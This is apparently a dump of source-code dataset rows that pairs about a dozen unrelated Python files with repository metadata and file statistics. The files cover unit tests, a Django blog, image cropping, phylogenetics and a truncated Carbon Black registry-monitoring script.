| 33.857143 | 110 | 0.670042 | 261 | 2,370 | 6.045977 | 0.521073 | 0.048796 | 0.016477 | 0.031686 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00387 | 0.236709 | 2,370 | 69 | 111 | 34.347826 | 0.868436 | 0.444726 | 0 | 0.045455 | 0 | 0 | 0.160123 | 0.017706 | 0 | 0 | 0 | 0.014493 | 0 | 1 | 0.022727 | false | 0 | 0.045455 | 0 | 0.090909 | 0.090909 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
fe317187c1c12b8c77ea5e51802f388e760744e4 | 1,324 | py | Python | tests/test_intbounds.py | alex/optimizer-model | 0e40a0763082f5fe0bd596e8e77ebccbcd7f4a98 | [
"BSD-3-Clause"
] | 4 | 2015-04-29T22:49:25.000Z | 2018-02-16T09:06:08.000Z | tests/test_intbounds.py | alex/optimizer-model | 0e40a0763082f5fe0bd596e8e77ebccbcd7f4a98 | [
"BSD-3-Clause"
] | null | null | null | tests/test_intbounds.py | alex/optimizer-model | 0e40a0763082f5fe0bd596e8e77ebccbcd7f4a98 | [
"BSD-3-Clause"
] | null | null | null | from optimizer.utils.intbounds import IntBounds
class TestIntBounds(object):
    def test_make_gt(self):
        i0 = IntBounds()
        i1 = i0.make_gt(IntBounds(10, 10))
        assert i1.lower == 11

    def test_make_gt_already_bounded(self):
        i0 = IntBounds()
        i1 = i0.make_gt(IntBounds(10, 10)).make_gt(IntBounds(0, 0))
        assert i1.lower == 11

    def test_make_lt(self):
        i0 = IntBounds()
        i1 = i0.make_lt(IntBounds(10, 10))
        assert i1.upper == 9

    def test_make_lt_already_bounded(self):
        i0 = IntBounds()
        i1 = i0.make_lt(IntBounds(0, 0)).make_lt(IntBounds(10, 10))
        assert i1.upper == -1

    def test_both_bounds(self):
        i0 = IntBounds()
        i1 = i0.make_lt(IntBounds(10, 10)).make_gt(IntBounds(0, 0))
        assert i1.upper == 9
        assert i1.lower == 1
        i2 = i0.make_gt(IntBounds(0, 0)).make_lt(IntBounds(10, 10))
        assert i2.lower == 1
        assert i2.upper == 9

    def test_make_le_already_bounded(self):
        i0 = IntBounds()
        i1 = i0.make_le(IntBounds(0, 0)).make_le(IntBounds(2, 2))
        assert i1.upper == 0

    def test_make_ge_already_bounded(self):
        i0 = IntBounds()
        i1 = i0.make_ge(IntBounds(10, 10)).make_ge(IntBounds(0, 0))
        assert i1.lower == 10
| 23.22807 | 67 | 0.5929 | 192 | 1,324 | 3.901042 | 0.166667 | 0.064085 | 0.140187 | 0.158879 | 0.699599 | 0.65287 | 0.620828 | 0.562083 | 0.365821 | 0.269693 | 0 | 0.092147 | 0.278701 | 1,324 | 56 | 68 | 23.642857 | 0.692147 | 0 | 0 | 0.323529 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.294118 | 1 | 0.205882 | false | 0 | 0.029412 | 0 | 0.264706 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
fe32cc9e555895354fe2279db255494d9b4433fb | 1,652 | py | Python | address_book/address_book.py | wowsuchnamaste/address_book | 4877d16d795c54b750e151fa93e69c080717ae72 | [
"MIT"
] | null | null | null | address_book/address_book.py | wowsuchnamaste/address_book | 4877d16d795c54b750e151fa93e69c080717ae72 | [
"MIT"
] | null | null | null | address_book/address_book.py | wowsuchnamaste/address_book | 4877d16d795c54b750e151fa93e69c080717ae72 | [
"MIT"
] | null | null | null | """A simple address book."""
from ._tools import generate_uuid
class AddressBook:
    """
    A simple address book.
    """

    def __init__(self):
        self._entries = []

    def add_entry(self, entry):
        """Add an entry to the address book."""
        self._entries.append(entry)

    def get_entries(self):
        """Returns a list of all entries in the address book.

        :return: ``list`` of ``Person`` objects.
        """
        return self._entries

    def get_entry(self, name):
        entry = [entry for entry in self._entries if entry.name == name]
        return entry[0]


class Entry:
    def __init__(
        self,
        name,
        first_name=None,
        last_name=None,
        address=None,
        phone_number=None,
        email=None,
        organization=None,
    ):
        self._uuid = generate_uuid()
        self.name = name
        self.first_name = first_name
        self.last_name = last_name
        self._parse_name(name)
        self.address = address
        self.phone_number = phone_number
        self.email = email
        self.organization = organization

    def __repr__(self):
        return self.name

    def _parse_name(self, name):
        """
        Parse whatever is passed as ``name`` and update ``self.name`` from that.

        :param name: A person's name as string or dictionary.
        :return: The method doesn't return anything.
        """
        if type(name) == dict:
            self.first_name = name["first_name"]
            self.last_name = name["last_name"]
            self.name = self.first_name + " " + self.last_name
| 25.415385 | 80 | 0.565981 | 197 | 1,652 | 4.532995 | 0.309645 | 0.080627 | 0.043673 | 0.057111 | 0.079507 | 0.055991 | 0 | 0 | 0 | 0 | 0 | 0.000906 | 0.331719 | 1,652 | 64 | 81 | 25.8125 | 0.807971 | 0.208838 | 0 | 0 | 1 | 0 | 0.016393 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.184211 | false | 0 | 0.026316 | 0.026316 | 0.342105 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
fe358e9590f17c8d7c10eb92232dc2f7d4b20167 | 235 | py | Python | config.py | volgachen/Chinese-Tokenization | 467e08da6fe271b6e33258d5aa6682c0405a3f32 | [
"Apache-2.0"
] | null | null | null | config.py | volgachen/Chinese-Tokenization | 467e08da6fe271b6e33258d5aa6682c0405a3f32 | [
"Apache-2.0"
] | null | null | null | config.py | volgachen/Chinese-Tokenization | 467e08da6fe271b6e33258d5aa6682c0405a3f32 | [
"Apache-2.0"
] | 1 | 2020-07-12T10:38:34.000Z | 2020-07-12T10:38:34.000Z | class Config:
    ngram = 2
    train_set = "data/rmrb.txt"
    modified_train_set = "data/rmrb_modified.txt"
    test_set = ""
    model_file = ""
    param_file = ""
    word_max_len = 10
    proposals_keep_ratio = 1.0
    use_re = 1
    subseq_num = 15 | 21.363636 | 47 | 0.67234 | 37 | 235 | 3.918919 | 0.756757 | 0.110345 | 0.165517 | 0.22069 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.043478 | 0.217021 | 235 | 11 | 48 | 21.363636 | 0.744565 | 0 | 0 | 0 | 0 | 0 | 0.154867 | 0.097345 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
fe3845f60103709c0d0030d388891565874650ad | 1,076 | py | Python | blogtech/src/blog/views.py | IVAN-URBACZKA/django-blog | 7ef6050c0de2938791843c3ec93e6e6a1e683baa | [
"MIT"
] | null | null | null | blogtech/src/blog/views.py | IVAN-URBACZKA/django-blog | 7ef6050c0de2938791843c3ec93e6e6a1e683baa | [
"MIT"
] | null | null | null | blogtech/src/blog/views.py | IVAN-URBACZKA/django-blog | 7ef6050c0de2938791843c3ec93e6e6a1e683baa | [
"MIT"
] | null | null | null | from django.urls import reverse_lazy, reverse
from django.utils.decorators import method_decorator
from django.views.generic import ListView, DetailView, CreateView, DeleteView, UpdateView
from .models import BlogPost
from django.contrib.auth.decorators import login_required
class BlogPostHomeView(ListView):
model = BlogPost
context_object_name = "posts"
class BlogPostDetailsView(DetailView):
model = BlogPost
context_object_name = "post"
@method_decorator(login_required, name='dispatch')
class BlogPostCreateView(CreateView):
model = BlogPost
fields = ['title', 'image','author', 'category', 'content']
def get_success_url(self):
return reverse('posts:home')
@method_decorator(login_required, name='dispatch')
class BlogPostUpdateView(UpdateView):
model = BlogPost
fields = ['title', 'author', 'category', 'content']
template_name = 'blog/blogpost_update.html'
@method_decorator(login_required, name='dispatch')
class BlogPostDeleteView(DeleteView):
model = BlogPost
success_url = reverse_lazy('posts:home') | 31.647059 | 89 | 0.760223 | 119 | 1,076 | 6.714286 | 0.445378 | 0.081352 | 0.075094 | 0.105131 | 0.244055 | 0.168961 | 0.168961 | 0 | 0 | 0 | 0 | 0 | 0.136617 | 1,076 | 34 | 90 | 31.647059 | 0.860065 | 0 | 0 | 0.307692 | 0 | 0 | 0.125348 | 0.023213 | 0 | 0 | 0 | 0 | 0 | 1 | 0.038462 | false | 0 | 0.192308 | 0.038462 | 0.884615 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
fe393898f4084fe1c0d82dbb19e8e9bf170a60ea | 4,514 | py | Python | apc_deep_vision/python/generate_data.py | Juxi/apb-baseline | fd47a5fd78cdfd75c68601a40ca4726d7d20c9ce | [
"BSD-3-Clause"
] | 9 | 2017-02-06T10:24:56.000Z | 2022-02-27T20:59:52.000Z | apc_deep_vision/python/generate_data.py | Juxi/apb-baseline | fd47a5fd78cdfd75c68601a40ca4726d7d20c9ce | [
"BSD-3-Clause"
] | null | null | null | apc_deep_vision/python/generate_data.py | Juxi/apb-baseline | fd47a5fd78cdfd75c68601a40ca4726d7d20c9ce | [
"BSD-3-Clause"
] | 2 | 2017-10-15T08:33:37.000Z | 2019-03-05T07:29:38.000Z | #! /usr/bin/env python
# ********************************************************************
# Software License Agreement (BSD License)
#
# Copyright (c) 2015, University of Colorado, Boulder
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of the University of Colorado Boulder
# nor the names of its contributors may be
# used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# ********************************************************************/
import cv2
import os
import numpy as np
if __name__ == '__main__':
    import argparse
    parser = argparse.ArgumentParser()
    parser.add_argument("proposal_path", type=str,
                        help="relative path from python script to proposals, no slash")
    parser.add_argument("--view", default=None,
                        help="true/1 shows each masked image")
    args = parser.parse_args()
    # args.proposal_path = "../test_proposals"
    # args.proposal_path = args.proposal_path
    included_extensions = ['txt']
    image_names = [fn[0:len(fn)-4] for fn in os.listdir(args.proposal_path)
                   if any(fn.endswith(ext) for ext in included_extensions)]
    for image_name in image_names:
        load_path = args.proposal_path + '/' + image_name
        image = cv2.imread(load_path + ".jpeg")
        data = np.loadtxt(load_path + ".txt", str)
        # If there is only one line, force data to be a list of lists anyway
        # Note, only works for our data as first list item is a string
        if isinstance(data[0], basestring):
            data = [data]
        # If any line does not conform to classification tl_x tl_y br_x br_y
        # then forget about it
        skip = False
        for line in data:
            if len(line) < 5:
                skip = True
        if skip:
            continue
        for i, proposal in zip(range(0, len(data)), data):
            mask = cv2.imread(load_path + '_mask{0:04d}.jpeg'.format(i))
            mask = np.invert(mask)
            maskGray = cv2.cvtColor(mask, cv2.COLOR_BGR2GRAY)
            ret, maskGray = cv2.threshold(maskGray, 128, 255, cv2.THRESH_BINARY)
            print load_path + '_mask{0:04d}.jpeg'.format(i)
            cropped = image[int(float(proposal[2])):int(float(proposal[4])),
                            int(float(proposal[1])):int(float(proposal[3]))]
            masked = cv2.bitwise_and(cropped, cropped, mask=maskGray)
            if args.view:
                cv2.imshow("original", masked)
                cv2.waitKey(0)
            mask_directory = args.proposal_path + '/masked/' + proposal[0]
            crop_directory = args.proposal_path + '/cropped/' + proposal[0]
            if not os.path.exists(mask_directory):
                os.makedirs(mask_directory)
            if not os.path.exists(crop_directory):
                os.makedirs(crop_directory)
            cv2.imwrite(mask_directory + '/{}_{}.jpeg'.format(image_name, i), masked)
            cv2.imwrite(crop_directory + '/{}_{}.jpeg'.format(image_name, i), cropped)
            # item = data[]
            # cropped = image[70:170, 440:540]
            # startY:endY, startX:endX
            # startX:startY, endX:endY
            #
| 37.932773 | 105 | 0.634914 | 577 | 4,514 | 4.87695 | 0.42461 | 0.034115 | 0.039801 | 0.01919 | 0.117271 | 0.088131 | 0.06752 | 0.06752 | 0.04833 | 0.04833 | 0 | 0.015616 | 0.248117 | 4,514 | 118 | 106 | 38.254237 | 0.813494 | 0.476961 | 0 | 0 | 0 | 0 | 0.088985 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.088889 | null | null | 0.022222 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
fe39cd977754d7baa5900e133ad7f76b583b9786 | 3,509 | py | Python | stats.py | shirshanka/fact-ory | 9e6bae63ca7f8f534b811058efb8942004d6a37b | [
"Apache-2.0"
] | null | null | null | stats.py | shirshanka/fact-ory | 9e6bae63ca7f8f534b811058efb8942004d6a37b | [
"Apache-2.0"
] | null | null | null | stats.py | shirshanka/fact-ory | 9e6bae63ca7f8f534b811058efb8942004d6a37b | [
"Apache-2.0"
] | null | null | null | import numpy as np;
import sys
import matplotlib.pyplot as plt;
from matplotlib import cm;
from termcolor import colored;
class Stats:
    def __init__(self, param1_range, param2_range):
        self._total_times = 0
        self._total_time = 0.0
        self._wrong_answers = []
        self._time_dict = {}
        self._param1_range = param1_range
        self._param2_range = param2_range
        self._param1_length = param1_range[1] - param1_range[0] + 1
        self._param2_length = param2_range[1] - param2_range[0] + 1
        self._red_color = 1.0
        self._green_color = 0.3
        self._cream_color = 0.6
        self._default_color = np.nan
        self._wrong_color = 1000.0
        self._time_penalty = 2.0  # time penalty, in seconds, added for a wrong answer
        self._result_matrix = np.full((self._param1_length, self._param2_length), self._default_color)

    def add_statistic(self, operator, param1, param2, ans, time_diff):
        self.add_time_statistic(param1, param2, time_diff)
        x_axis = param1 - self._param1_range[0]
        y_axis = param2 - self._param2_range[0]
        curr_value = self._result_matrix[x_axis][y_axis]
        incr_value = time_diff
        if operator.evaluate(param1, param2) != ans:
            # wrong answer
            self.add_wrong_answer(param1, param2, ans)
            incr_value = incr_value + self._time_penalty
        else:
            # right answer: do nothing
            pass
        if np.isnan(curr_value):
            self._result_matrix[x_axis][y_axis] = incr_value
        else:
            self._result_matrix[x_axis][y_axis] = curr_value + incr_value

    def add_time_statistic(self, param1, param2, time_diff):
        self._total_times = self._total_times + 1
        self._total_time = self._total_time + time_diff
        if param1 not in self._time_dict:
            self._time_dict[param1] = []
        if param2 not in self._time_dict:
            self._time_dict[param2] = []
        self._time_dict[param1].append(time_diff)
        self._time_dict[param2].append(time_diff)

    def add_wrong_answer(self, param1, param2, answer_given):
        self._wrong_answers.append((param1, param2, answer_given))

    def get_avg_time(self):
        return self._total_time / self._total_times

    def print_stats(self, operator):
        sys.stdout.write("You took an average of %0.2f seconds to answer each question!\n" % self.get_avg_time())
        if self._wrong_answers != []:
            print("Here were the answers you got wrong...")
            for (f1, f2, ans) in self._wrong_answers:
                print("%d %s %d = " % (f1, operator.symbol, f2), colored("%d" % ans, "red"), "Correct answer is", colored("%d" % operator.evaluate(f1, f2), "green"))
        row_labels = range(self._param1_range[0], self._param1_range[1] + 1)
        col_labels = range(self._param2_range[0], self._param2_range[1] + 1)
        # plt.matshow(self._result_matrix, cmap=cm.Spectral_r, vmin=0, vmax=1)
        fig = plt.figure()
        ax = fig.add_subplot(111)
        cax = ax.matshow(self._result_matrix, interpolation='nearest', vmin=0)
        fig.colorbar(cax)
        plt.gca().set_aspect('auto')
        row_ticks = range(len(row_labels))
        col_ticks = range(len(col_labels))
        if len(row_labels) > 10:
            skip_every = int(len(row_labels) / 10)
            row_labels = row_labels[0::skip_every]
            row_ticks = row_ticks[0::skip_every]
        if len(col_labels) > 10:
            skip_every = int(len(col_labels) / 10)
            col_labels = col_labels[0::skip_every]
            col_ticks = col_ticks[0::skip_every]
        plt.xticks(col_ticks, col_labels)
        plt.yticks(row_ticks, row_labels)
        plt.show()
if __name__ == "__main__":
    print("hello world")
| 34.742574 | 154 | 0.68937 | 529 | 3,509 | 4.228733 | 0.253308 | 0.040232 | 0.03755 | 0.022798 | 0.111757 | 0.092088 | 0.071524 | 0.039338 | 0.039338 | 0.039338 | 0 | 0.03499 | 0.185523 | 3,509 | 100 | 155 | 35.09 | 0.747726 | 0.042177 | 0 | 0.025641 | 0 | 0 | 0.051251 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.012821 | 0.064103 | null | null | 0.051282 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
fe3c354a94b9bc97c332f504c7fb8dc959b31224 | 7,019 | py | Python | manila/tests/share/test_snapshot_access.py | gouthampacha/manila | 4b7ba9b99d272663f519b495668715fbf979ffbc | [
"Apache-2.0"
] | 3 | 2016-06-06T13:05:00.000Z | 2021-05-05T04:29:24.000Z | manila/tests/share/test_snapshot_access.py | gouthampacha/manila | 4b7ba9b99d272663f519b495668715fbf979ffbc | [
"Apache-2.0"
] | 5 | 2019-08-14T06:46:03.000Z | 2021-12-13T20:01:25.000Z | manila/tests/share/test_snapshot_access.py | gouthampacha/manila | 4b7ba9b99d272663f519b495668715fbf979ffbc | [
"Apache-2.0"
] | 2 | 2020-03-15T01:24:15.000Z | 2020-07-22T20:34:26.000Z | # Copyright (c) 2016 Hitachi Data Systems, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import ddt
import mock
from manila.common import constants
from manila import context
from manila import db
from manila import exception
from manila.share import snapshot_access
from manila import test
from manila.tests import db_utils
from manila import utils
@ddt.ddt
class SnapshotAccessTestCase(test.TestCase):
def setUp(self):
super(SnapshotAccessTestCase, self).setUp()
self.driver = self.mock_class("manila.share.driver.ShareDriver",
mock.Mock())
self.snapshot_access = snapshot_access.ShareSnapshotInstanceAccess(
db, self.driver)
self.context = context.get_admin_context()
share = db_utils.create_share()
self.snapshot = db_utils.create_snapshot(share_id=share['id'])
self.snapshot_instance = db_utils.create_snapshot_instance(
snapshot_id=self.snapshot['id'],
share_instance_id=self.snapshot['share']['instance']['id'])
@ddt.data(constants.ACCESS_STATE_QUEUED_TO_APPLY,
constants.ACCESS_STATE_QUEUED_TO_DENY)
def test_update_access_rules(self, state):
rules = []
for i in range(2):
rules.append({
'id': 'id-%s' % i,
'state': state,
'access_id': 'rule_id%s' % i
})
all_rules = copy.deepcopy(rules)
all_rules.append({
'id': 'id-3',
'state': constants.ACCESS_STATE_ERROR,
'access_id': 'rule_id3'
})
snapshot_instance_get = self.mock_object(
db, 'share_snapshot_instance_get',
mock.Mock(return_value=self.snapshot_instance))
snap_get_all_for_snap_instance = self.mock_object(
db, 'share_snapshot_access_get_all_for_snapshot_instance',
mock.Mock(return_value=all_rules))
self.mock_object(db, 'share_snapshot_instance_access_update')
self.mock_object(self.driver, 'snapshot_update_access')
self.mock_object(self.snapshot_access, '_check_needs_refresh',
mock.Mock(return_value=False))
self.mock_object(db, 'share_snapshot_instance_access_delete')
self.snapshot_access.update_access_rules(self.context,
self.snapshot_instance['id'])
snapshot_instance_get.assert_called_once_with(
utils.IsAMatcher(context.RequestContext),
self.snapshot_instance['id'], with_share_data=True)
snap_get_all_for_snap_instance.assert_called_once_with(
utils.IsAMatcher(context.RequestContext),
self.snapshot_instance['id'])
if state == constants.ACCESS_STATE_QUEUED_TO_APPLY:
self.driver.snapshot_update_access.assert_called_once_with(
utils.IsAMatcher(context.RequestContext),
self.snapshot_instance, rules, add_rules=rules,
delete_rules=[], share_server=None)
else:
self.driver.snapshot_update_access.assert_called_once_with(
utils.IsAMatcher(context.RequestContext),
self.snapshot_instance, [], add_rules=[],
delete_rules=rules, share_server=None)
def test_update_access_rules_delete_all_rules(self):
rules = []
for i in range(2):
rules.append({
'id': 'id-%s' % i,
'state': constants.ACCESS_STATE_QUEUED_TO_DENY,
'access_id': 'rule_id%s' % i
})
snapshot_instance_get = self.mock_object(
db, 'share_snapshot_instance_get',
mock.Mock(return_value=self.snapshot_instance))
snap_get_all_for_snap_instance = self.mock_object(
db, 'share_snapshot_access_get_all_for_snapshot_instance',
mock.Mock(side_effect=[rules, []]))
self.mock_object(db, 'share_snapshot_instance_access_update')
self.mock_object(self.driver, 'snapshot_update_access')
self.mock_object(db, 'share_snapshot_instance_access_delete')
self.snapshot_access.update_access_rules(self.context,
self.snapshot_instance['id'],
delete_all_rules=True)
snapshot_instance_get.assert_called_once_with(
utils.IsAMatcher(context.RequestContext),
self.snapshot_instance['id'], with_share_data=True)
snap_get_all_for_snap_instance.assert_called_with(
utils.IsAMatcher(context.RequestContext),
self.snapshot_instance['id'])
self.driver.snapshot_update_access.assert_called_with(
utils.IsAMatcher(context.RequestContext), self.snapshot_instance,
[], add_rules=[], delete_rules=rules, share_server=None)

    def test_update_access_rules_exception(self):
rules = []
for i in range(2):
rules.append({
'id': 'id-%s' % i,
'state': constants.ACCESS_STATE_APPLYING,
'access_id': 'rule_id%s' % i
})
snapshot_instance_get = self.mock_object(
db, 'share_snapshot_instance_get',
mock.Mock(return_value=self.snapshot_instance))
snap_get_all_for_snap_instance = self.mock_object(
db, 'share_snapshot_access_get_all_for_snapshot_instance',
mock.Mock(return_value=rules))
self.mock_object(db, 'share_snapshot_instance_access_update')
self.mock_object(self.driver, 'snapshot_update_access',
mock.Mock(side_effect=exception.NotFound))
self.assertRaises(exception.NotFound,
self.snapshot_access.update_access_rules,
self.context, self.snapshot_instance['id'])
snapshot_instance_get.assert_called_once_with(
utils.IsAMatcher(context.RequestContext),
self.snapshot_instance['id'], with_share_data=True)
snap_get_all_for_snap_instance.assert_called_once_with(
utils.IsAMatcher(context.RequestContext),
self.snapshot_instance['id'])
self.driver.snapshot_update_access.assert_called_once_with(
utils.IsAMatcher(context.RequestContext), self.snapshot_instance,
rules, add_rules=rules, delete_rules=[], share_server=None)

# This sample tests the type checker's reportUnnecessaryCast feature.
from typing import cast, Union
def foo(a: int):
# This should generate an error if
# reportUnnecessaryCast is enabled.
b = cast(int, a)
c: Union[int, str] = "hello"
d = cast(int, c)
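A point worth making explicit next to this sample: `cast` is purely a static-analysis hint, which is why an *unnecessary* cast is flagged as noise rather than as a behavior change. A minimal standalone sketch (independent of the test sample above):

```python
from typing import cast

# cast() only informs the static type checker; at runtime it returns its
# argument unchanged, so no conversion or validation ever happens.
value = "hello"
same = cast(int, value)  # the object is still a str at runtime
assert same is value
print(type(same).__name__)  # → str
```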

import requests
import logging
import cfscrape
import os
from manhwaDownloader.constants import CONSTANTS as CONST
logging.basicConfig(level=logging.DEBUG)
folderPath = os.path.join(CONST.OUTPUTPATH, 'serious-taste-of-forbbiden-fruit')
logging.info(len([file for file in os.walk(folderPath)]))
walkList = [file for file in os.walk(folderPath)]
chapterDicts = dict()
for folder, _, files in walkList[1:]:
chapterDicts.update({folder: files})
print(chapterDicts)

class Solution:
def allPossibleFBT(self, N):
def constr(N):
if N == 1: yield TreeNode(0)
for i in range(1, N, 2):
for l in constr(i):
for r in constr(N - i - 1):
m = TreeNode(0)
m.left = l
m.right = r
yield m
        return list(constr(N))

import os
from Bio import AlignIO, Phylo
from Bio.Phylo.TreeConstruction import DistanceCalculator, DistanceTreeConstructor
class Phylogenetic:
def __init__(self, PATH):
self.PATH=PATH
def binary_sequence_generator(self, input_kmer_pattern, label):
string_inp="".join([ 'A' if x==0 else 'C' for x in input_kmer_pattern])
return([">"+label,string_inp])
def multifasta_fille_generator(self, converted_sequences_phyolgenetic):
file_output = open(os.path.join(self.PATH,"binary_presence_absence_kmers.fasta"), "w")
file_output.writelines('\n'.join(converted_sequences_phyolgenetic) + '\n' )
file_output.close()
def distance_matrix_generator(self):
align = AlignIO.read(os.path.join(self.PATH,"binary_presence_absence_kmers.fasta"), "fasta")
calculator = DistanceCalculator('identity')
distMatrix = calculator.get_distance(align)
return(distMatrix)
def distance_tree_file_generator(self,distance_matrix):
constructor = DistanceTreeConstructor()
UPGMATree = constructor.upgma(distance_matrix)
        Phylo.write(UPGMATree, os.path.join(self.PATH,"binary_presence_absence_kmers.tre") , "newick")

#!/usr/bin/env python
#
#The MIT License (MIT)
#
# Copyright (c) 2015 Bit9 + Carbon Black
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
# -----------------------------------------------------------------------------
# Extension regmod watcher and grabber
#
# This script listens to the CB messaging bus for registry modification events,
# and when a modification is seen that matches a regular expression from a file
# of registry path regular expressions, it goes and grabs the registry value
# using CB Live Response.
#
# You need to make sure rabbitmq is enabled in cb.conf, and you might need to
# open a firewall rule for port 5004. You also will need to enable regmod
# in the DatastoreBroadcastEventTypes=<values> entry. If anything is changed
# here, you'll have to do service cb-enterprise restart.
#
# TODO: More error handling, more performance improvements
#
# last updated 2016-01-23 by Ben Johnson bjohnson@bit9.com (dev-support@bit9.com)
#
import re
import queue
import sys
from threading import Thread
import time
import traceback
try:
from cbapi.legacy.util.cli_helpers import main_helper
from cbapi.legacy.util.composite_helpers import MessageSubscriberAndLiveResponseActor
import cbapi.legacy.util.sensor_events_pb2 as cpb
except ImportError:
from cbapi.util.cli_helpers import main_helper
from cbapi.util.composite_helpers import MessageSubscriberAndLiveResponseActor
import cbapi.util.sensor_events_pb2 as cpb
class RegistryModWatcherAndValueGrabber(MessageSubscriberAndLiveResponseActor):
"""
This class subscribes to messages from the CB messaging bus,
looking for regmod events. For each regmod event, it checks
to see if the the registry path matches one of our regexes.
If it does, it goes and grabs it.
"""
def __init__(self, cb_server_url, cb_ext_api, username, password, regmod_regexes, verbose):
self.regmod_regexes = regmod_regexes
self.verbose = verbose
MessageSubscriberAndLiveResponseActor.__init__(self,
cb_server_url,
cb_ext_api,
username,
password,
"ingress.event.regmod")
# Threading so that message queue arrives do not block waiting for live response
        self.queue = queue.Queue()
self.go = True
self.worker_thread = Thread(target=self._worker_thread_loop)
self.worker_thread.start()
def on_stop(self):
self.go = False
self.worker_thread.join(timeout=2)
MessageSubscriberAndLiveResponseActor.on_stop(self)
def consume_message(self, channel, method_frame, header_frame, body):
if "application/protobuf" != header_frame.content_type:
return
try:
